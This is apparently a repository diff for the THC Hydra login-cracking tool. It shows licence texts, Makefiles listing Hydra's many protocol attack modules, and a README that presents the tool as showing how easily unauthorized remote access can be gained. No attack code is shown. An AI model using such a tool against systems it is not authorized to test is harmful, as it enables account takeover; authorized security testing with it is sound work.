System Libraries, or general-purpose tools or generally available free
programs which are used unmodified in performing those activities but
which are not part of the work. For example, Corresponding Source
includes interface definition files associated with source files for
the work, and the source code for shared libraries and dynamically
linked subprograms that the work is specifically designed to require,
such as by intimate data communication or control flow between those
subprograms and other parts of the work.
The Corresponding Source need not include anything that users
can regenerate automatically from other parts of the Corresponding
Source.
The Corresponding Source for a work in source code form is that
same work.
2. Basic Permissions.
All rights granted under this License are granted for the term of
copyright on the Program, and are irrevocable provided the stated
conditions are met. This License explicitly affirms your unlimited
permission to run the unmodified Program. The output from running a
covered work is covered by this License only if the output, given its
content, constitutes a covered work. This License acknowledges your
rights of fair use or other equivalent, as provided by copyright law.
You may make, run and propagate covered works that you do not
convey, without conditions so long as your license otherwise remains
in force. You may convey covered works to others for the sole purpose
of having them make modifications exclusively for you, or provide you
with facilities for running those works, provided that you comply with
the terms of this License in conveying all material for which you do
not control copyright. Those thus making or running the covered works
for you must do so exclusively on your behalf, under your direction
and control, on terms that prohibit them from making any copies of
your copyrighted material outside their relationship with you.
Conveying under any other circumstances is permitted solely under
the conditions stated below. Sublicensing is not allowed; section 10
makes it unnecessary.
3. Protecting Users' Legal Rights From Anti-Circumvention Law.
No covered work shall be deemed part of an effective technological
measure under any applicable law fulfilling obligations under article
11 of the WIPO copyright treaty adopted on 20 December 1996, or
similar laws prohibiting or restricting circumvention of such
measures.
When you convey a covered work, you waive any legal power to forbid
circumvention of technological measures to the extent such circumvention
is effected by exercising rights under this License with respect to
the covered work, and you disclaim any intention to limit operation or
modification of the work as a means of enforcing, against the work's
users, your or third parties' legal rights to forbid circumvention of
technological measures.
4. Conveying Verbatim Copies.
You may convey verbatim copies of the Program's source code as you
receive it, in any medium, provided that you conspicuously and
appropriately publish on each copy an appropriate copyright notice;
keep intact all notices stating that this License and any
non-permissive terms added in accord with section 7 apply to the code;
keep intact all notices of the absence of any warranty; and give all
recipients a copy of this License along with the Program.
You may charge any price or no price for each copy that you convey,
and you may offer support or warranty protection for a fee.
5. Conveying Modified Source Versions.
You may convey a work based on the Program, or the modifications to
produce it from the Program, in the form of source code under the
terms of section 4, provided that you also meet all of these conditions:
a) The work must carry prominent notices stating that you modified
it, and giving a relevant date.
b) The work must carry prominent notices stating that it is
released under this License and any conditions added under section
7. This requirement modifies the requirement in section 4 to
"keep intact all notices".
c) You must license the entire work, as a whole, under this
License to anyone who comes into possession of a copy. This
License will therefore apply, along with any applicable section 7
additional terms, to the whole of the work, and all its parts,
regardless of how they are packaged. This License gives no
permission to license the work in any other way, but it does not
invalidate such permission if you have separately received it.
d) If the work has interactive user interfaces, each must display
Appropriate Legal Notices; however, if the Program has interactive
interfaces that do not display Appropriate Legal Notices, your
work need not make them do so.
A compilation of a covered work with other separate and independent
works, which are not by their nature extensions of the covered work,
and which are not combined with it such as to form a larger program,
in or on a volume of a storage or distribution medium, is called an
"aggregate" if the compilation and its resulting copyright are not
used to limit the access or legal rights of the compilation's users
beyond what the individual works permit. Inclusion of a covered work
in an aggregate does not cause this License to apply to the other
parts of the aggregate.
6. Conveying Non-Source Forms.
You may convey a covered work in object code form under the terms
of sections 4 and 5, provided that you also convey the
machine-readable Corresponding Source under the terms of this License,
in one of these ways:
a) Convey the object code in, or embodied in, a physical product
(including a physical distribution medium), accompanied by the
Corresponding Source fixed on a durable physical medium
customarily used for software interchange.
b) Convey the object code in, or embodied in, a physical product
(including a physical distribution medium), accompanied by a
written offer, valid for at least three years and valid for as
long as you offer spare parts or customer support for that product
model, to give anyone who possesses the object code either (1) a
copy of the Corresponding Source for all the software in the
product that is covered by this License, on a durable physical
medium customarily used for software interchange, for a price no
more than your reasonable cost of physically performing this
conveying of source, or (2) access to copy the
Corresponding Source from a network server at no charge.
c) Convey individual copies of the object code with a copy of the
written offer to provide the Corresponding Source. This
alternative is allowed only occasionally and noncommercially, and
only if you received the object code with such an offer, in accord
with subsection 6b.
d) Convey the object code by offering access from a designated
place (gratis or for a charge), and offer equivalent access to the
Corresponding Source in the same way through the same place at no
further charge. You need not require recipients to copy the
Corresponding Source along with the object code. If the place to
copy the object code is a network server, the Corresponding Source
may be on a different server (operated by you or a third party)
that supports equivalent copying facilities, provided you maintain
clear directions next to the object code saying where to find the
Corresponding Source. Regardless of what server hosts the
Corresponding Source, you remain obligated to ensure that it is
available for as long as needed to satisfy these requirements.
e) Convey the object code using peer-to-peer transmission, provided
you inform other peers where the object code and Corresponding
Source of the work are being offered to the general public at no
charge under subsection 6d.
A separable portion of the object code, whose source code is excluded
from the Corresponding Source as a System Library, need not be
included in conveying the object code work.
A "User Product" is either (1) a "consumer product", which means any
tangible personal property which is normally used for personal, family,
or household purposes, or (2) anything designed or sold for incorporation
into a dwelling. In determining whether a product is a consumer product,
doubtful cases shall be resolved in favor of coverage. For a particular
product received by a particular user, "normally used" refers to a
typical or common use of that class of product, regardless of the status
of the particular user or of the way in which the particular user
actually uses, or expects or is expected to use, the product. A product
is a consumer product regardless of whether the product has substantial
commercial, industrial or non-consumer uses, unless such uses represent
the only significant mode of use of the product.
"Installation Information" for a User Product means any methods,
procedures, authorization keys, or other information required to install
and execute modified versions of a covered work in that User Product from
a modified version of its Corresponding Source. The information must
suffice to ensure that the continued functioning of the modified object
code is in no case prevented or interfered with solely because
modification has been made.
If you convey an object code work under this section in, or with, or
specifically for use in, a User Product, and the conveying occurs as
part of a transaction in which the right of possession and use of the
User Product is transferred to the recipient in perpetuity or for a
fixed term (regardless of how the transaction is characterized), the
Corresponding Source conveyed under this section must be accompanied
by the Installation Information. But this requirement does not apply
if neither you nor any third party retains the ability to install
modified object code on the User Product (for example, the work has
been installed in ROM).
The requirement to provide Installation Information does not include a
requirement to continue to provide support service, warranty, or updates
for a work that has been modified or installed by the recipient, or for
the User Product in which it has been modified or installed. Access to a
network may be denied when the modification itself materially and
adversely affects the operation of the network or violates the rules and
protocols for communication across the network.
Corresponding Source conveyed, and Installation Information provided,
in accord with this section must be in a format that is publicly
documented (and with an implementation available to the public in
source code form), and must require no special password or key for
unpacking, reading or copying.
7. Additional Terms.
"Additional permissions" are terms that supplement the terms of this
License by making exceptions from one or more of its conditions.
Additional permissions that are applicable to the entire Program shall
be treated as though they were included in this License, to the extent
that they are valid under applicable law. If additional permissions
apply only to part of the Program, that part may be used separately
under those permissions, but the entire Program remains governed by
this License without regard to the additional permissions.
When you convey a copy of a covered work, you may at your option
remove any additional permissions from that copy, or from any part of
it. (Additional permissions may be written to require their own
removal in certain cases when you modify the work.) You may place
additional permissions on material, added by you to a covered work,
for which you have or can give appropriate copyright permission.
Notwithstanding any other provision of this License, for material you
add to a covered work, you may (if authorized by the copyright holders of
that material) supplement the terms of this License with terms:
a) Disclaiming warranty or limiting liability differently from the
terms of sections 15 and 16 of this License; or
b) Requiring preservation of specified reasonable legal notices or
author attributions in that material or in the Appropriate Legal
Notices displayed by works containing it; or
c) Prohibiting misrepresentation of the origin of that material, or
requiring that modified versions of such material be marked in
reasonable ways as different from the original version; or
d) Limiting the use for publicity purposes of names of licensors or
authors of the material; or
e) Declining to grant rights under trademark law for use of some
trade names, trademarks, or service marks; or
f) Requiring indemnification of licensors and authors of that
material by anyone who conveys the material (or modified versions of
it) with contractual assumptions of liability to the recipient, for
any liability that these contractual assumptions directly impose on
those licensors and authors.
All other non-permissive additional terms are considered "further
restrictions" within the meaning of section 10. If the Program as you
received it, or any part of it, contains a notice stating that it is
governed by this License along with a term that is a further
restriction, you may remove that term. If a license document contains
a further restriction but permits relicensing or conveying under this
License, you may add to a covered work material governed by the terms
of that license document, provided that the further restriction does
not survive such relicensing or conveying.
If you add terms to a covered work in accord with this section, you
must place, in the relevant source files, a statement of the
additional terms that apply to those files, or a notice indicating
where to find the applicable terms.
Additional terms, permissive or non-permissive, may be stated in the
form of a separately written license, or stated as exceptions;
the above requirements apply either way.
8. Termination.
You may not propagate or modify a covered work except as expressly
provided under this License. Any attempt otherwise to propagate or
modify it is void, and will automatically terminate your rights under
this License (including any patent licenses granted under the third
paragraph of section 11).
However, if you cease all violation of this License, then your
license from a particular copyright holder is reinstated (a)
provisionally, unless and until the copyright holder explicitly and
finally terminates your license, and (b) permanently, if the copyright
holder fails to notify you of the violation by some reasonable means
prior to 60 days after the cessation.
Moreover, your license from a particular copyright holder is
reinstated permanently if the copyright holder notifies you of the
violation by some reasonable means, this is the first time you have
received notice of violation of this License (for any work) from that
copyright holder, and you cure the violation prior to 30 days after
your receipt of the notice.
Termination of your rights under this section does not terminate the
licenses of parties who have received copies or rights from you under
this License. If your rights have been terminated and not permanently
reinstated, you do not qualify to receive new licenses for the same
material under section 10.
9. Acceptance Not Required for Having Copies.
You are not required to accept this License in order to receive or
run a copy of the Program. Ancillary propagation of a covered work
occurring solely as a consequence of using peer-to-peer transmission
to receive a copy likewise does not require acceptance. However,
nothing other than this License grants you permission to propagate or
modify any covered work. These actions infringe copyright if you do
not accept this License. Therefore, by modifying or propagating a
covered work, you indicate your acceptance of this License to do so.
10. Automatic Licensing of Downstream Recipients.
Each time you convey a covered work, the recipient automatically
receives a license from the original licensors, to run, modify and
propagate that work, subject to this License. You are not responsible
for enforcing compliance by third parties with this License.
An "entity transaction" is a transaction transferring control of an
organization, or substantially all assets of one, or subdividing an
organization, or merging organizations. If propagation of a covered
work results from an entity transaction, each party to that
transaction who receives a copy of the work also receives whatever
licenses to the work the party's predecessor in interest had or could
give under the previous paragraph, plus a right to possession of the
Corresponding Source of the work from the predecessor in interest, if
the predecessor has it or can get it with reasonable efforts.
You may not impose any further restrictions on the exercise of the
rights granted or affirmed under this License. For example, you may
not impose a license fee, royalty, or other charge for exercise of
rights granted under this License, and you may not initiate litigation
(including a cross-claim or counterclaim in a lawsuit) alleging that
any patent claim is infringed by making, using, selling, offering for
sale, or importing the Program or any portion of it.
11. Patents.
A "contributor" is a copyright holder who authorizes use under this
License of the Program or a work on which the Program is based. The
work thus licensed is called the contributor's "contributor version".
A contributor's "essential patent claims" are all patent claims
owned or controlled by the contributor, whether already acquired or
hereafter acquired, that would be infringed by some manner, permitted
by this License, of making, using, or selling its contributor version,
but do not include claims that would be infringed only as a
consequence of further modification of the contributor version. For
purposes of this definition, "control" includes the right to grant
patent sublicenses in a manner consistent with the requirements of
this License.
Each contributor grants you a non-exclusive, worldwide, royalty-free
patent license under the contributor's essential patent claims, to
make, use, sell, offer for sale, import and otherwise run, modify and
propagate the contents of its contributor version.
In the following three paragraphs, a "patent license" is any express
agreement or commitment, however denominated, not to enforce a patent
(such as an express permission to practice a patent or covenant not to
sue for patent infringement). To "grant" such a patent license to a
party means to make such an agreement or commitment not to enforce a
patent against the party.
If you convey a covered work, knowingly relying on a patent license,
and the Corresponding Source of the work is not available for anyone
to copy, free of charge and under the terms of this License, through a
publicly available network server or other readily accessible means,
then you must either (1) cause the Corresponding Source to be so
available, or (2) arrange to deprive yourself of the benefit of the
patent license for this particular work, or (3) arrange, in a manner
consistent with the requirements of this License, to extend the patent
license to downstream recipients. "Knowingly relying" means you have
actual knowledge that, but for the patent license, your conveying the
covered work in a country, or your recipient's use of the covered work
in a country, would infringe one or more identifiable patents in that
country that you have reason to believe are valid.
If, pursuant to or in connection with a single transaction or
arrangement, you convey, or propagate by procuring conveyance of, a
covered work, and grant a patent license to some of the parties
receiving the covered work authorizing them to use, propagate, modify
or convey a specific copy of the covered work, then the patent license
you grant is automatically extended to all recipients of the covered
work and works based on it.
A patent license is "discriminatory" if it does not include within
the scope of its coverage, prohibits the exercise of, or is
conditioned on the non-exercise of one or more of the rights that are
specifically granted under this License. You may not convey a covered
work if you are a party to an arrangement with a third party that is
in the business of distributing software, under which you make payment
to the third party based on the extent of your activity of conveying
the work, and under which the third party grants, to any of the
parties who would receive the covered work from you, a discriminatory
patent license (a) in connection with copies of the covered work
conveyed by you (or copies made from those copies), or (b) primarily
for and in connection with specific products or compilations that
contain the covered work, unless you entered into that arrangement,
or that patent license was granted, prior to 28 March 2007.
Nothing in this License shall be construed as excluding or limiting
any implied license or other defenses to infringement that may
otherwise be available to you under applicable patent law.
12. No Surrender of Others' Freedom.
If conditions are imposed on you (whether by court order, agreement or
otherwise) that contradict the conditions of this License, they do not
excuse you from the conditions of this License. If you cannot convey a
covered work so as to satisfy simultaneously your obligations under this
License and any other pertinent obligations, then as a consequence you may
not convey it at all. For example, if you agree to terms that obligate you
to collect a royalty for further conveying from those to whom you convey
the Program, the only way you could satisfy both those terms and this
License would be to refrain entirely from conveying the Program.
13. Remote Network Interaction; Use with the GNU General Public License.
Notwithstanding any other provision of this License, if you modify the
Program, your modified version must prominently offer all users
interacting with it remotely through a computer network (if your version
supports such interaction) an opportunity to receive the Corresponding
Source of your version by providing access to the Corresponding Source
from a network server at no charge, through some standard or customary
means of facilitating copying of software. This Corresponding Source
shall include the Corresponding Source for any work covered by version 3
of the GNU General Public License that is incorporated pursuant to the
following paragraph.
Notwithstanding any other provision of this License, you have
permission to link or combine any covered work with a work licensed
under version 3 of the GNU General Public License into a single
combined work, and to convey the resulting work. The terms of this
License will continue to apply to the part which is the covered work,
but the work with which it is combined will remain governed by version
3 of the GNU General Public License.
14. Revised Versions of this License.
The Free Software Foundation may publish revised and/or new versions of
the GNU Affero General Public License from time to time. Such new versions
will be similar in spirit to the present version, but may differ in detail to
address new problems or concerns.
Each version is given a distinguishing version number. If the
Program specifies that a certain numbered version of the GNU Affero General
Public License "or any later version" applies to it, you have the
option of following the terms and conditions either of that numbered
version or of any later version published by the Free Software
Foundation. If the Program does not specify a version number of the
GNU Affero General Public License, you may choose any version ever published
by the Free Software Foundation.
If the Program specifies that a proxy can decide which future
versions of the GNU Affero General Public License can be used, that proxy's
public statement of acceptance of a version permanently authorizes you
to choose that version for the Program.
Later license versions may give you additional or different
permissions. However, no additional obligations are imposed on any
author or copyright holder as a result of your choosing to follow a
later version.
15. Disclaimer of Warranty.
THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
16. Limitation of Liability.
IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
SUCH DAMAGES.
17. Interpretation of Sections 15 and 16.
If the disclaimer of warranty and limitation of liability provided
above cannot be given local legal effect according to their terms,
reviewing courts shall apply local law that most closely approximates
an absolute waiver of all civil liability in connection with the
Program, unless a warranty or assumption of liability accompanies a
copy of the Program in return for a fee.
END OF TERMS AND CONDITIONS
How to Apply These Terms to Your New Programs
If you develop a new program, and you want it to be of the greatest
possible use to the public, the best way to achieve this is to make it
free software which everyone can redistribute and change under these terms.
To do so, attach the following notices to the program. It is safest
to attach them to the start of each source file to most effectively
state the exclusion of warranty; and each file should have at least
the "copyright" line and a pointer to where the full notice is found.
<one line to give the program's name and a brief idea of what it does.>
Copyright (C) <year> <name of author>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
Also add information on how to contact you by electronic and paper mail.
If your software can interact with users remotely through a computer
network, you should also make sure that it provides a way for users to
get its source. For example, if your program is a web application, its
interface could display a "Source" link that leads users to an archive
of the code. There are many ways you could offer source, and different
solutions will be better for different programs; see section 13 for the
specific requirements.
You should also get your employer (if you work as a programmer) or school,
if any, to sign a "copyright disclaimer" for the program, if necessary.
For more information on this, and how to apply and follow the GNU AGPL, see
<http://www.gnu.org/licenses/>.
Special Exception
* In addition, as a special exception, the copyright holders give
* permission to link the code of portions of this program with the
* OpenSSL library under certain conditions as described in each
* individual source file, and distribute linked combinations
* including the two.
* You must obey the GNU Affero General Public License in all respects
* for all of the code used other than OpenSSL. If you modify
* file(s) with this exception, you may extend this exception to your
* version of the file(s), but you are not obligated to do so. If you
* do not wish to do so, delete this exception statement from your
* version. If you delete this exception statement from all source
* files in the program, then also delete it here.

170
LICENSE.OPENSSL Executable file
View file

@ -0,0 +1,170 @@
/*
* (c) 2002, 2003, 2004 by Jason McLaughlin and Riadh Elloumi
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License as
* published by the Free Software Foundation; either version 2 of the
* License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful, but
* is provided AS IS, WITHOUT ANY WARRANTY; without even the implied
* warranty of MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, and
* NON-INFRINGEMENT. See the GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place - Suite 330, Boston,
* MA 02111-1307, USA.
*
* In addition, as a special exception, the copyright holders give
* permission to link the code of portions of this program with the
* OpenSSL library under certain conditions as described in each
* individual source file, and distribute linked combinations
* including the two.
* You must obey the GNU General Public License in all respects
* for all of the code used other than OpenSSL. If you modify
* file(s) with this exception, you may extend this exception to your
* version of the file(s), but you are not obligated to do so. If you
* do not wish to do so, delete this exception statement from your
* version. If you delete this exception statement from all source
* files in the program, then also delete it here.
*/
Certain source files in this program permit linking with the OpenSSL
library (http://www.openssl.org), which otherwise wouldn't be allowed
under the GPL. For purposes of identifying OpenSSL, most source files
giving this permission limit it to versions of OpenSSL having a license
identical to that listed in this file (LICENSE.OpenSSL). It is not
necessary for the copyright years to match between this file and the
OpenSSL version in question. However, note that because this file is
an extension of the license statements of these source files, this file
may not be changed except with permission from all copyright holders
of source files in this program which reference this file.
LICENSE ISSUES
==============
The OpenSSL toolkit stays under a dual license, i.e. both the conditions of
the OpenSSL License and the original SSLeay license apply to the toolkit.
See below for the actual license texts. Actually both licenses are BSD-style
Open Source licenses. In case of any license issues related to OpenSSL
please contact openssl-core@openssl.org.
OpenSSL License
---------------
/* ====================================================================
* Copyright (c) 1998-2001 The OpenSSL Project. All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
*
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
*
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* 3. All advertising materials mentioning features or use of this
* software must display the following acknowledgment:
* "This product includes software developed by the OpenSSL Project
* for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
*
* 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
* endorse or promote products derived from this software without
* prior written permission. For written permission, please contact
* openssl-core@openssl.org.
*
* 5. Products derived from this software may not be called "OpenSSL"
* nor may "OpenSSL" appear in their names without prior written
* permission of the OpenSSL Project.
*
* 6. Redistributions of any form whatsoever must retain the following
* acknowledgment:
* "This product includes software developed by the OpenSSL Project
* for use in the OpenSSL Toolkit (http://www.openssl.org/)"
*
* THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
* EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
* PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE OpenSSL PROJECT OR
* ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
* SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
* NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
* LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
* STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
* ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
* OF THE POSSIBILITY OF SUCH DAMAGE.
* ====================================================================
*
* This product includes cryptographic software written by Eric Young
* (eay@cryptsoft.com). This product includes software written by Tim
* Hudson (tjh@cryptsoft.com).
*
*/
Original SSLeay License
-----------------------
/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
* All rights reserved.
*
* This package is an SSL implementation written
* by Eric Young (eay@cryptsoft.com).
* The implementation was written so as to conform with Netscapes SSL.
*
* This library is free for commercial and non-commercial use as long as
* the following conditions are aheared to. The following conditions
* apply to all code found in this distribution, be it the RC4, RSA,
* lhash, DES, etc., code; not just the SSL code. The SSL documentation
* included with this distribution is covered by the same copyright terms
* except that the holder is Tim Hudson (tjh@cryptsoft.com).
*
* Copyright remains Eric Young's, and as such any Copyright notices in
* the code are not to be removed.
* If this package is used in a product, Eric Young should be given attribution
* as the author of the parts of the library used.
* This can be in the form of a textual message at program startup or
* in documentation (online or textual) provided with the package.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. All advertising materials mentioning features or use of this software
* must display the following acknowledgement:
* "This product includes cryptographic software written by
* Eric Young (eay@cryptsoft.com)"
* The word 'cryptographic' can be left out if the rouines from the library
* being used are not cryptographic related :-).
* 4. If you include any Windows specific code (or a derivative thereof) from
* the apps directory (application code) you must include an acknowledgement:
* "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
*
* THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
* The licence and distribution terms for any publically available version or
* derivative of this code cannot be changed. i.e. this code cannot simply be
* copied and put under another distribution licence
* [including the GNU Public Licence.]
*/

5
Makefile Normal file
View file

@ -0,0 +1,5 @@
all:
@echo Error: you must run "./configure" first
clean:
cp -f Makefile.orig Makefile

73
Makefile.am Normal file
View file

@ -0,0 +1,73 @@
#
# Makefile for Hydra - (c) 2001-2014 by van Hauser / THC <vh@thc.org>
#
OPTS=-I. -O3
# -Wall -g -pedantic
LIBS=-lm
DIR=/bin
SRC = hydra-vnc.c hydra-pcnfs.c hydra-rexec.c hydra-nntp.c hydra-socks5.c \
hydra-telnet.c hydra-cisco.c hydra-http.c hydra-ftp.c hydra-imap.c \
hydra-pop3.c hydra-smb.c hydra-icq.c hydra-cisco-enable.c hydra-ldap.c \
hydra-mysql.c hydra-mssql.c hydra-xmpp.c hydra-http-proxy-urlenum.c \
hydra-snmp.c hydra-cvs.c hydra-smtp.c hydra-smtp-enum.c hydra-sapr3.c hydra-ssh.c \
hydra-sshkey.c hydra-teamspeak.c hydra-postgres.c hydra-rsh.c hydra-rlogin.c \
hydra-oracle-listener.c hydra-svn.c hydra-pcanywhere.c hydra-sip.c \
hydra-oracle.c hydra-vmauthd.c hydra-asterisk.c hydra-firebird.c hydra-afp.c hydra-ncp.c \
hydra-oracle-sid.c hydra-http-proxy.c hydra-http-form.c hydra-irc.c \
hydra-rdp.c hydra-s7-300.c hydra-redis.c \
crc32.c d3des.c bfg.c ntlm.c sasl.c hmacmd5.c hydra-mod.c
OBJ = hydra-vnc.o hydra-pcnfs.o hydra-rexec.o hydra-nntp.o hydra-socks5.o \
hydra-telnet.o hydra-cisco.o hydra-http.o hydra-ftp.o hydra-imap.o \
hydra-pop3.o hydra-smb.o hydra-icq.o hydra-cisco-enable.o hydra-ldap.o \
hydra-mysql.o hydra-mssql.o hydra-xmpp.o hydra-http-proxy-urlenum.o \
hydra-snmp.o hydra-cvs.o hydra-smtp.o hydra-smtp-enum.o hydra-sapr3.o hydra-ssh.o \
hydra-sshkey.o hydra-teamspeak.o hydra-postgres.o hydra-rsh.o hydra-rlogin.o \
hydra-oracle-listener.o hydra-svn.o hydra-pcanywhere.o hydra-sip.o \
hydra-oracle-sid.o hydra-oracle.o hydra-vmauthd.o hydra-asterisk.o hydra-firebird.o hydra-afp.o hydra-ncp.o \
hydra-http-proxy.o hydra-http-form.o hydra-irc.o hydra-redis.o \
hydra-rdp.o hydra-s7-300.c \
crc32.o d3des.o bfg.o ntlm.o sasl.o hmacmd5.o hydra-mod.o
BINS = hydra pw-inspector
EXTRA_DIST = README README.arm README.palm CHANGES TODO INSTALL LICENSE \
hydra-mod.h hydra.h crc32.h d3des.h
all: pw-inspector hydra $(XHYDRA_SUPPORT)
@echo
@echo Now type "make install"
hydra: hydra.c $(OBJ)
$(CC) $(OPTS) $(SEC) $(LIBS) $(CFLAGS) $(CPPFLAGS) $(LDFLAGS) -o hydra $(HYDRA_LOGO) hydra.c $(OBJ) $(LIBS) $(XLIBS) $(XLIBPATHS) $(XIPATHS) $(XDEFINES)
@echo
@echo If men could get pregnant, abortion would be a sacrament
@echo
xhydra:
-cd hydra-gtk && sh ./make_xhydra.sh
pw-inspector: pw-inspector.c
-$(CC) $(OPTS) $(SEC) $(CFLAGS) $(CPPFLAGS) $(LDFLAGS) -o pw-inspector $(PWI_LOGO) pw-inspector.c
.c.o:
$(CC) $(OPTS) $(SEC) $(CFLAGS) $(CPPFLAGS) -c $< $(XDEFINES) $(XIPATHS)
strip: all
strip $(BINS)
-echo OK > /dev/null && test -x xhydra && strip xhydra || echo OK > /dev/null
install: strip
-mkdir -p $(PREFIX)$(DIR)
cp -f hydra-wizard.sh $(BINS) $(PREFIX)$(DIR) && cd $(PREFIX)$(DIR) && chmod 755 hydra-wizard.sh $(BINS)
-echo OK > /dev/null && test -x xhydra && cp xhydra $(PREFIX)$(DIR) && cd $(PREFIX)$(DIR) && chmod 755 xhydra || echo OK > /dev/null
-sed -e "s|^INSTALLDIR=.*|INSTALLDIR="$(PREFIX)"|" dpl4hydra.sh > $(PREFIX)/bin/dpl4hydra.sh
-chmod 755 $(PREFIX)/bin/dpl4hydra.sh
-mkdir -p $(PREFIX)/etc/
-cp -f *.csv $(PREFIX)/etc/
-mkdir -p $(PREFIX)/man/man1
-cp -f hydra.1 xhydra.1 pw-inspector.1 $(PREFIX)/man/man1
clean:
rm -rf xhydra pw-inspector hydra *.o core *.core *.stackdump *~ Makefile.in Makefile dev_rfc hydra.restore arm/*.ipk arm/ipkg/usr/bin/* hydra-gtk/src/*.o hydra-gtk/src/xhydra hydra-gtk/stamp-h hydra-gtk/config.status hydra-gtk/errors hydra-gtk/config.log hydra-gtk/src/.deps hydra-gtk/src/Makefile hydra-gtk/Makefile
cp -f Makefile.orig Makefile

5
Makefile.orig Normal file
View file

@ -0,0 +1,5 @@
all:
@echo Error: you must run "./configure" first
clean:
cp -f Makefile.orig Makefile

2
Makefile.unix Normal file
View file

@ -0,0 +1,2 @@
CC=gcc
STRIP=strip

229
README Normal file
View file

@ -0,0 +1,229 @@
H Y D R A
(c) 2001-2014 by van Hauser / THC
<vh@thc.org> http://www.thc.org
co-maintained by David (dot) Maciejak @ gmail (dot) com
BFG code by Jan Dlabal <dlabaljan@gmail.com>
Licensed under AGPLv3 (see LICENSE file)
INTRODUCTION
------------
Number one of the biggest security holes are passwords, as every password
security study shows.
This tool is a proof of concept code, to give researchers and security
consultants the possiblity to show how easy it would be to gain unauthorized
access from remote to a system.
THIS TOOL IS FOR LEGAL PURPOSES ONLY!
There are already several login hacker tools available, however none does
either support more than one protocol to attack or support parallized
connects.
It was tested to compile cleanly on Linux, Windows/Cygwin, Solaris, FreeBSD
and OSX.
Currently this tool supports:
